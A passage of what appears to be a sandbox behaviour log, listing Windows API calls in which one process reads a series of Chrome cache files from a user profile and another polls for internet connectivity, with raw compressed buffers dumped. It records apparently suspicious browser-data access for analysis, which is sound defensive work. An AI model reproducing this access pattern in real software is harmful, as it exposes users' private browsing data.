ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000030 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,025 | 504 | NtReadFile |
Buffer => \x00\x00\x01\x00\x06\x00\x80\x80\x10\x00\x00\x00\x00\x00h(\x00\x00f\x00\x00\x00HH\x10\x00\x00\x00\x00\x00\xe8
\x00\x00\xce(\x00\x0000\x10\x00\x00\x00\x00\x00h\x06\x00\x00\xb66\x00\x00 \x10\x00\x00\x00\x00\x00\xe8\x02\x00\x00\x1e=\x00\x00\x18\x18\x10\x00\x00\x00\x00\x00\xe8\x01\x00\x00\x06@\x00\x00\x10\x10\x10\x00\x00\x00\x00\x00(\x01\x00\x00\xeeA\x00\x00(\x00\x00\x00\x80\x00\x00\x00\x00\x01\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\x00\xef\xa4\x00\x00\x00\xb9\xff\x00\x00\xba\x7f\x00"P\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"""""""""""""""""""""""""""""" \x00\x00\x033333333333333333 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,085 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:07,085 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000031 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,095 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x04\x00\xed\xbd\x07`\x1cI\x96%&/m\xca{\x7fJ\xf5J\xd7\xe0t\xa1\x08\x80`\x13$\xd8\x90@\x10\xec\xc1\x88\xcd\xe6\x92\xec\x1diG#)\xab*\x81\xcaeVe]f\x16@\xcc\xed\x9d\xbc\xf7\xde{\xef\xbd\xf7\xde{\xef\xbd\xf7\xba;\x9dN'\xf7\xdf\xff?\fd\x01l\xf6\xceJ\xda\xc9\x9e!\x80\xaa\xc8\x1f?~|\x1f?"\xfe\xc7\xbf\xf7\x1f|\xfc\xbb>\xfd\xf2\xe4\xcd\xef\xf3\xf24\x9d\xb7\x8b\xf2\xe81\xfeM\xdf-\xcae\xf3\xd9G\xf3\xb6]=\xba{\xf7\xea\xeaj|uo\\xd5\x17ww\x1f>|x\xf7\x1d\xda|DM\xf3lv\xf4x\x91\xb7\x19\xbd\xdb\xae\xb6\xf3_\xb4..?\xfb\xe8\xf7\xde\xfe\xeax\xfb\xa4Z\xac\xb2\xb6\x98\x94\xf9G\xe9\xb4Z\xb6\xf9\xb2\xfd\xec\xa3\xb3\xd3\xcf\xf2\xd9\x05}rW_\x9b\xce\xb3\xba\xc9\xe9\x9bu{\xbe}\xe0>_f\x8b\xfc\xb3\x8f.\x8b\xfcjU\xd5\xad\x07\xe1\xaa\x98\xb5\xf3\xcf FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,135 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:07,135 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:07,135 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:07,135 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:07,135 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:07,155 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:07,155 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000034 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,245 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x04\x00\xed\xbd\x07`\x1cI\x96%&/m\xca{\x7fJ\xf5J\xd7\xe0t\xa1\x08\x80`\x13$\xd8\x90@\x10\xec\xc1\x88\xcd\xe6\x92\xec\x1diG#)\xab*\x81\xcaeVe]f\x16@\xcc\xed\x9d\xbc\xf7\xde{\xef\xbd\xf7\xde{\xef\xbd\xf7\xba;\x9dN'\xf7\xdf\xff?\fd\x01l\xf6\xceJ\xda\xc9\x9e!\x80\xaa\xc8\x1f?~|\x1f?"\xfe\xc7\xbf\xf7\x1f|\xfc\xbb>\xfd\xf2\xe4\xcd\xef\xf3\xf24\x9d\xb7\x8b\xf2\xe81\xfeM\xdf-\xcae\xf3\xd9G\xf3\xb6]=\xba{\xf7\xea\xeaj|uo\\xd5\x17ww\x1f>|x\xf7\x1d\xda|DM\xf3lv\xf4x\x91\xb7\x19\xbd\xdb\xae\xb6\xf3_\xb4..?\xfb\xe8\xf7\xde\xfe\xeax\xfb\xa4Z\xac\xb2\xb6\x98\x94\xf9G\xe9\xb4Z\xb6\xf9\xb2\xfd\xec\xa3\xb3\xd3\xcf\xf2\xd9\x05}rW_\x9b\xce\xb3\xba\xc9\xe9\x9bu{\xbe}\xe0>_f\x8b\xfc\xb3\x8f.\x8b\xfcjU\xd5\xad\x07\xe1\xaa\x98\xb5\xf3\xcf FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,365 | 504 | NtReadFile |
Buffer => \xd9\xcd\xee\xedO\xb6wv&\xe74Y\xf9\x01\xcd1\xa9\xa2\xfd\xc9\xfe\xeey\x96Mf\xf7\xef\x91\xaex\xcf\xc9\xba\xba\xba
g\xean\xb3\xae\xcf3\x0c\x83\xa6\x08/\xa0\xeb\xfb\x0f\xc7$\xb8\xf4\x81\xce\x19\xad\xcf\xbc\x96fv\xd2\xa6\xd9t:\xdb\x9d\xedoO\x1e\x9c?$\xd9\xa7\x9c\xfbCJ\xb9\x93\x8f\xfc\xe0\xfe\xee\xce\xf9\xf9\x8c\xe6\xed}'MQ\x89\xcd\xda\xc3l\xbaw\xef\xe0\xd3\xc9\xf6\xde\x03J\xf6\x9f\x7fzow\xfbA>%[w\x7fv@\x0b\x044s\x07\x84q0\xfa\x81Y\xd3\x81\xbc\xd7\xb4= u?;\xcf\x89-\x89Q\xf6w\x11\x8d\xee\x93\x00\xd1\xba\xf2\xee\xbd\xec<'\x19#-\xa4\xd3\xb6C\x12F\xab\x1e\x9fn\xef\x11S\x13a0m\x0f\xb3\x9c\xa83y\xf8\xe9\x0ei\xa4\xfd\x1d\x9a\xa7\xaf1m\xaa\x81Vs\xcaK\x80|<Ah\x8b^?\xa5\x18\x85\xfe\xa4&\x98/\xd2\xf4\xaaJ\xd2\x97hngm\xe7\xd3\x87\x94(\xcd'\xdb\xe7\xf7h- FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,385 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:07,385 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000037 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,395 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x04\x00\xed\xbd\x07`\x1cI\x96%&/m\xca{\x7fJ\xf5J\xd7\xe0t\xa1\x08\x80`\x13$\xd8\x90@\x10\xec\xc1\x88\xcd\xe6\x92\xec\x1diG#)\xab*\x81\xcaeVe]f\x16@\xcc\xed\x9d\xbc\xf7\xde{\xef\xbd\xf7\xde{\xef\xbd\xf7\xba;\x9dN'\xf7\xdf\xff?\fd\x01l\xf6\xceJ\xda\xc9\x9e!\x80\xaa\xc8\x1f?~|\x1f?"\xfe\xc7\xbf\xf7\x1f|\xfc\xbb>\xfd\xf2\xe4\xcd\xef\xf3\xf24\x9d\xb7\x8b\xf2\xe81\xfeM\xdf-\xcae\xf3\xd9G\xf3\xb6]=\xba{\xf7\xea\xeaj|uo\\xd5\x17ww\x1f>|x\xf7\x1d\xda|DM\xf3lv\xf4x\x91\xb7\x19\xbd\xdb\xae\xb6\xf3_\xb4..?\xfb\xe8\xf7\xde\xfe\xeax\xfb\xa4Z\xac\xb2\xb6\x98\x94\xf9G\xe9\xb4Z\xb6\xf9\xb2\xfd\xec\xa3\xb3\xd3\xcf\xf2\xd9\x05}rW_\x9b\xce\xb3\xba\xc9\xe9\x9bu{\xbe}\xe0>_f\x8b\xfc\xb3\x8f.\x8b\xfcjU\xd5\xad\x07\xe1\xaa\x98\xb5\xf3\xcf FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,535 | 504 | NtReadFile |
Buffer => \xdd\xce\xef\x91\xc1?\xff\x94\xf2\x96\x0f)\xcbO \xbe|\xf7AN\x19\x87\xa9\xb7vJ\xfe\x1f\xf9332\xd9;\x14\xbb\xef\xefQf\x83B"\xca
\xd0$\xdf\xff4{0y0#4\xdew\xbc\x843Mmg\xcc\x98N\x1e\x11\xde@\xdf\xc4e\xf8\x93\x1ac\x80\xc4rFp\x8f\xa9\xa5\x1b\xd6-\xfce\xf9\x97\xfe1\xa8\x91\xf6V_T\x90\x14\xcb\x0ewt{O?\x82\x03\x98\x15K\xfat\x91\xbd\xbb*f\xed\\xbf\xb8\xa8\x0bJ\xd0\x9bo\xd5\x07%\xff\x91\xc0\x92\xb6\xe6\xbf\xe0\x91\xbe\xaf\xfbJ\x06\xd5\xc7\x10~T\xd7}\x157\x15\x0e|\xe8\xbe:\xb7V0\xd4\xd1\x907\x98\x95\xf9\xaa\x98\xbe%4\x058\xc8z\xff\xd3s\xca\xd8\x11\x83\xe7;\x19\x99\xa8\xc9\x8cLmF:k\x97\xd8\xe1\x1e-\xf6N\xee\xb3\x89Bs\xc5\xe5\xff\x87N=\x03R\xa0\x05}\xbc}QV\x13Z\xfe0\x0e\xacp\xff>\x99\xe0\x1d
{\xb7\xf7\xce\x1f\x12\xa9\x0e \xe89\xad\xa4\xef FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,545 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:07,545 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000040 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,555 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x04\x00\xed\xbd\x07`\x1cI\x96%&/m\xca{\x7fJ\xf5J\xd7\xe0t\xa1\x08\x80`\x13$\xd8\x90@\x10\xec\xc1\x88\xcd\xe6\x92\xec\x1diG#)\xab*\x81\xcaeVe]f\x16@\xcc\xed\x9d\xbc\xf7\xde{\xef\xbd\xf7\xde{\xef\xbd\xf7\xba;\x9dN'\xf7\xdf\xff?\fd\x01l\xf6\xceJ\xda\xc9\x9e!\x80\xaa\xc8\x1f?~|\x1f?"\xfe\xc7\xbf\xf7\x1f|\xfc\xbb>\xfd\xf2\xe4\xcd\xef\xf3\xf24\x9d\xb7\x8b\xf2\xe81\xfeM\xdf-\xcae\xf3\xd9G\xf3\xb6]=\xba{\xf7\xea\xeaj|uo\\xd5\x17ww\x1f>|x\xf7\x1d\xda|DM\xf3lv\xf4x\x91\xb7\x19\xbd\xdb\xae\xb6\xf3_\xb4..?\xfb\xe8\xf7\xde\xfe\xeax\xfb\xa4Z\xac\xb2\xb6\x98\x94\xf9G\xe9\xb4Z\xb6\xf9\xb2\xfd\xec\xa3\xb3\xd3\xcf\xf2\xd9\x05}rW_\x9b\xce\xb3\xba\xc9\xe9\x9bu{\xbe}\xe0>_f\x8b\xfc\xb3\x8f.\x8b\xfcjU\xd5\xad\x07\xe1\xaa\x98\xb5\xf3\xcf FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,615 | 504 | NtReadFile |
Buffer => \x89\xd9\xf6\xe1\x1b\x1c\xec>\xd8'O\xe8\xc1\xbd\xf3\xfb\xc4\x8b\x0f\xef\x910\x0fz\x93\xb4fy\xff~N\xb9\xc6\xddO\xf7\xefm\xe7{\xa4\xf3(\xc6%\xae\x9d\xd1R\xff\xce\x83sZc!\x03M\x0e\xc5\xad\x1b{\xded\x9a\xfe#\x7fu\xba\xb7\xb3\xbb\x9fZ\x1f\xc0}i}I\x0c\xee\xd6!\xdd\xd0\xbf\xf4\x8f\x19\x1e\x19 1JjJ`Y\xbey3\xf4\x9eV\x88 4\xd3\xbaX\xb5)\xac\xc5g\x1f\xb5dP\xef\xfetv\x99\xc9\xa7\x1f\x1d\xdd\xfd\xd6\xe3\xdf\xf5{'O\x8f\xdf\x1c\x7f\xef[w/)\xd9N\xff\x7f\x9d_,(q\xcd\x8ba\x9f\xed\x8e\xe8\x93\x93\x92\x82;b\xf9\xe9[b\x80\xcfv\xf8\xa35e\xc0\x16ym?\xe5\x86\xc7\xeb\xb6zV\xd4\xf9\xcb\x9f\xfcl\xe7\xee\xb7\xbe\xff\xfd\xa3o\xdd%\x82s_7`\x82\xc9&\x1eS\x06\x1e\xf6\x1e_ss\xca\xbf\xf1\xcf\xf1O7\xef~\x8f\xb7\x9f}z@2s\x9f\x92H9\xc9
1\xc7\x0e\xf1\xca. FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,615 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:07,615 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000046 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,635 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x04\x00\xed\xbd\x07`\x1cI\x96%&/m\xca{\x7fJ\xf5J\xd7\xe0t\xa1\x08\x80`\x13$\xd8\x90@\x10\xec\xc1\x88\xcd\xe6\x92\xec\x1diG#)\xab*\x81\xcaeVe]f\x16@\xcc\xed\x9d\xbc\xf7\xde{\xef\xbd\xf7\xde{\xef\xbd\xf7\xba;\x9dN'\xf7\xdf\xff?\fd\x01l\xf6\xceJ\xda\xc9\x9e!\x80\xaa\xc8\x1f?~|\x1f?"\xfe\xc7\xbf\xf7\x1f|\xfc\xbb>\xfd\xf2\xe4\xcd\xef\xf3\xf24\x9d\xb7\x8b\xf2\xe81\xfeM\xdf-\xcae\xf3\xd9G\xf3\xb6]=\xba{\xf7\xea\xeaj|uo\\xd5\x17ww\x1f>|x\xf7\x1d\xda|DM\xf3lv\xf4x\x91\xb7\x19\xbd\xdb\xae\xb6\xf3_\xb4..?\xfb\xe8\xf7\xde\xfe\xeax\xfb\xa4Z\xac\xb2\xb6\x98\x94\xf9G\xe9\xb4Z\xb6\xf9\xb2\xfd\xec\xa3\xb3\xd3\xcf\xf2\xd9\x05}rW_\x9b\xce\xb3\xba\xc9\xe9\x9bu{\xbe}\xe0>_f\x8b\xfc\xb3\x8f.\x8b\xfcjU\xd5\xad\x07\xe1\xaa\x98\xb5\xf3\xcf FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,696 | 504 | NtReadFile |
Buffer => NQ\xf9\x01\xf8\x9c\xb3:\xf2\xdaP\x86\x07\xc0&\xb4Ft@\xeb\x18\xdb\xf7\x0f\x1e\x92\xfa\xbdOaq6\xbd\x9fm\x93 \xa1T:\x99d\xcamPk1;\x0f\xef\xd1\xc2\x00\x96?(!MI\xf3\xec>\x9c\xcc\x8c<RJT>\x98N\xef\xef\xd1K\xefmv.\xaa\x8e\xd5\xf9=\xd0\x88\xba\xa3<\xe9\xc1\xbd=\x92A\xa2\x81~D
\x95\xf4\x06\xfdM\x0e\x17|/2@'D\xadl\xda\xa6k\xcf\xf3\xd2\xb1\xcd(\xbfC\xcb\xbb\x9fn?\xd8\xbfOH\xee\x92\x8fH\x11\xec9-\x02\xcf\x1e\x9228\x7f\xf0\xe0\x1eE\xcd:\xb6l\x7fo6\x9dP\x00x\x7fJ\xd9\xc4\xfd}Z\x16\x9aPxO\x19jZ\x0f"?\x84,-\x19\xb7\x0f\x1d\xdb\xf9\x15Z\xdd\xfd=\x9e\xd3\xbfg4D\x12\x83\x03"\x19\x8d\x08\x9f\x03\x8f\x87\x0fe\xc4:Bb\xad\x97uq\x99M\xafu\xd5sJ\xcb\x81E$\x1e\xdc\xa3e\x8bO'\xf9d\xfb>-]\xd0D~\xfap\xfb FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,706 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:07,706 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000049 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,716 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x04\x00\xed\xbd\x07`\x1cI\x96%&/m\xca{\x7fJ\xf5J\xd7\xe0t\xa1\x08\x80`\x13$\xd8\x90@\x10\xec\xc1\x88\xcd\xe6\x92\xec\x1diG#)\xab*\x81\xcaeVe]f\x16@\xcc\xed\x9d\xbc\xf7\xde{\xef\xbd\xf7\xde{\xef\xbd\xf7\xba;\x9dN'\xf7\xdf\xff?\fd\x01l\xf6\xceJ\xda\xc9\x9e!\x80\xaa\xc8\x1f?~|\x1f?"\xfe\xc7\xbf\xf7\x1f|\xfc\xbb>\xfd\xf2\xe4\xcd\xef\xf3\xf24\x9d\xb7\x8b\xf2\xe81\xfeM\xdf-\xcae\xf3\xd9G\xf3\xb6]=\xba{\xf7\xea\xeaj|uo\\xd5\x17ww\x1f>|x\xf7\x1d\xda|DM\xf3lv\xf4x\x91\xb7\x19\xbd\xdb\xae\xb6\xf3_\xb4..?\xfb\xe8\xf7\xde\xfe\xeax\xfb\xa4Z\xac\xb2\xb6\x98\x94\xf9G\xe9\xb4Z\xb6\xf9\xb2\xfd\xec\xa3\xb3\xd3\xcf\xf2\xd9\x05}rW_\x9b\xce\xb3\xba\xc9\xe9\x9bu{\xbe}\xe0>_f\x8b\xfc\xb3\x8f.\x8b\xfcjU\xd5\xad\x07\xe1\xaa\x98\xb5\xf3\xcf FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,766 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:07,796 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00004a DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,806 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03J+\xcdK.\xc9\xcc\xcfSHO- ,M-\xaa\x0cK\xcc)M\xd5\xc8\xd3)\xd1\xac.K,R(\xb2\xcdK-W\x08JMw\xad(\xd0P\x8a\x8e\x89\xb1W\x8bU\xd2.\xd1V\xb2\xd5\x88\x8eSS\x8e\xd5\xd2T\xd2QJ\xcfT\xd2\xd4\xc9\xb4-\xd2K\xadHM\xd6\xc8\xd3\xb4.J-)-\xcaS\xc8\xb4\xb5\xcd+\xcd\xc9\xb1WR\xb2JIM\xceOI
\xf2t\xce\xcf-\xc8\xcfK\xcd+\xd1\xc8\x8c6\x8c\xd5+J-\xc8ILN\xd5\xd0\x8f\xd1\xd6O\xd7QRP\xd2\xd4\xacMCrSpI~\x11\xd09\x10\xc7\x94\xd8*9\xe7\xe4\x17\xa7\x16C\x84\xf5\x12\x8bs+\x94t\x8at2\xadU4\x94\xf4\x8aAb\xba\xe9\xa9\xf9\xd1)\x89%\x89\xba\xee\xa9\xf9`U>\xf9\xc9\x899\xc1\xa9Ee\x99\xc9@\xfb}b\x954\xf5rR\xf3\xd2K2\xd4\xd44JlQ4\x02\xa5\xd22\x8b\x8aK44\xf5\x12 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,866 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:07,866 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00004b DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,886 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03rH\xcb\xcf+\xd1MKLN\xad\x86\xb2r3s*\xad\xd4\xcb\xd3\xe2\x8bS\xd3\xf3SuK3\xe3s2\xd33J\xd4\xad\x8b\x8b\x92\xadJ\x8br4\xd4\xf5\xf53\xf5\x8aus3\x93\x8b\xf2\x8b\xf3\xd3J\xf4\x92\xf3s\xf5A\x9a\x8b\xf5aZ\xf4\xcbS\x8bKtSK\x8b\xf2\x0bR\x13\xf3\xf4\xc1\x06\xe8\xe7$\x96\x00E\xf5R\xf3K\xd45\xc1\x86\xe5\xe4''\xe6h(\x05\x834)\x84z*\xf8\x80\x94)i\xea\xa0\x88\x87\x07\xc0\xc5\xa9c\xb9\xbdrfjZf\x85\xba\xa6BZ~Qnb\x89\x86zjnRjJJj\x8a.PC^IeA\xaa:U\xec*\xcfOKC\xb2\x05\xc2\xa5\x86\xc1%%\xc8\xe6\x96\x14\x95\xa6R\xcf\xd1\xc5e\xe9\xca\xe5\xa9IH\xe6\x03E\x80\xf1\x05N\x1c\xe5\xa9 \xa5Vy \x99\x1c\x88PqIeN*T\xa4\xd6\x01,\x84?1A\x94R\x92\x9a &\x10LNh 3 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,936 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:07,936 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:07,936 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:07,936 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:07,936 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:07,936 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:07,946 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00004c DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,956 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x04\x00\xed\xbd\x07`\x1cI\x96%&/m\xca{\x7fJ\xf5J\xd7\xe0t\xa1\x08\x80`\x13$\xd8\x90@\x10\xec\xc1\x88\xcd\xe6\x92\xec\x1diG#)\xab*\x81\xcaeVe]f\x16@\xcc\xed\x9d\xbc\xf7\xde{\xef\xbd\xf7\xde{\xef\xbd\xf7\xba;\x9dN'\xf7\xdf\xff?\fd\x01l\xf6\xceJ\xda\xc9\x9e!\x80\xaa\xc8\x1f?~|\x1f?"\xfe\xc7\xbf\xf7\x1f|\xfc\xbb>\xfd\xf2\xe4\xcd\xef\xf3\xf24\x9d\xb7\x8b\xf2\xe81\xfeM\xdf-\xcae\xf3\xd9G\xf3\xb6]=\xba{\xf7\xea\xeaj|uo\\xd5\x17ww\x1f>|x\xf7\x1d\xda|DM\xf3lv\xf4x\x91\xb7\x19\xbd\xdb\xae\xb6\xf3_\xb4..?\xfb\xe8\xf7\xde\xfe\xeax\xfb\xa4Z\xac\xb2\xb6\x98\x94\xf9G\xe9\xb4Z\xb6\xf9\xb2\xfd\xec\xa3\xb3\xd3\xcf\xf2\xd9\x05}rW_\x9b\xce\xb3\xba\xc9\xe9\x9bu{\xbe}\xe0>_f\x8b\xfc\xb3\x8f.\x8b\xfcjU\xd5\xad\x07\xe1\xaa\x98\xb5\xf3\xcf FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,026 | 504 | NtReadFile |
Buffer => {\xa4+\xdes\xb2\xae\xae\xae\xc2\x99\xba\xdb\xac\xeb\xf3\x0c\xc3\xa0)\xc2\x0b\xe8\xfa\xfe\xc31 .}\xa0sF\xeb3\xaf\xa5\x99\x9d\xb4i6\x9d\xcevg\xfb\xdb\x93\x07\xe7\x0fI\xf6)\xe7\xfe\x90R\xee\xe4#?\xb8\xbf\xbbs~>\xa3y{\xdfISTb\xb3\xf60\x9b\xee\xdd;\xf8t\xb2\xbd\xf7\x80\x92\xfd\xe7\x9f\xde\xdb\xdd~\x90O\xc9\xd6\xdd\x9f\x1d\xd0\x02\x01\xcd\xdc\x01a\x1c\x8c~`\xd6t \xef5m\x0fH\xdd\xcf\xcesbKb\x94\xfd]D\xa3\xfb$@\xb4\xae\xbc{/;\xcfI\xc6H\x0b\xe9\xb4\xed\x90\x84\xd1\xaa\xc7\xa7\xdb{\xc4\xd4D\x18L\xdb\xc3,'\xeaL\x1e~\xbaC\x1ai\x7f\x87\xe6\xe9kL\x9bj\xa0\xd5\x9c\xf2\x12 \x1fO\x10\xda\xa2\xd7O)F\xa1?\xa9 \xe6\x8b4\xbd\xaa\x92\xf4%\x9a\xdbY\xdb\xf9\xf4!%J\xf3\xc9\xf6\xf9=Z\x0b\xd8\xcf\xc9\xa8\x1d\xdc\xdb\xa1L\xecdv\xef\xe0\xfe\xfd\xfb\xf9\xc3=\xc2\xe6\xfdf\xcd\xc7+ FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,046 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:08,046 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00004d DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,056 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03J+\xcdK.\xc9\xcc\xcfSHO- ,M-\xaa\x0cK\xcc)M\xd5\xc8\xd3)\xd1\xac.K,R(\xb2\xcdK-W\x08JMw\xad(\xd0P\x8a\x8e\x89\xb1W\x8bU\xd2.\xd1V\xb2\xd5\x88\x8eSS\x8e\xd5\xd2T\xd2QJ\xcfT\xd2\xd4\xc9\xb4-\xd2K\xadHM\xd6\xc8\xd3\xb4.J-)-\xcaS\xc8\xb4\xb5\xcd+\xcd\xc9\xb1WR\xb2JIM\xceOI
\xf2t\xce\xcf-\xc8\xcfK\xcd+\xd1\xc8\x8c6\x8c\xd5+J-\xc8ILN\xd5\xd0\x8f\xd1\xd6O\xd7QRP\xd2\xd4\xacMCrSpI~\x11\xd09\x10\xc7\x94\xd8*9\xe7\xe4\x17\xa7\x16C\x84\xf5\x12\x8bs+\x94t\x8at2\xadU4\x94\xf4\x8aAb\xba\xe9\xa9\xf9\xd1)\x89%\x89\xba\xee\xa9\xf9`U>\xf9\xc9\x899\xc1\xa9Ee\x99\xc9@\xfb}b\x954\xf5rR\xf3\xd2K2\xd4\xd44JlQ4\x02\xa5\xd22\x8b\x8aK44\xf5\x12 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,136 | 504 | NtReadFile |
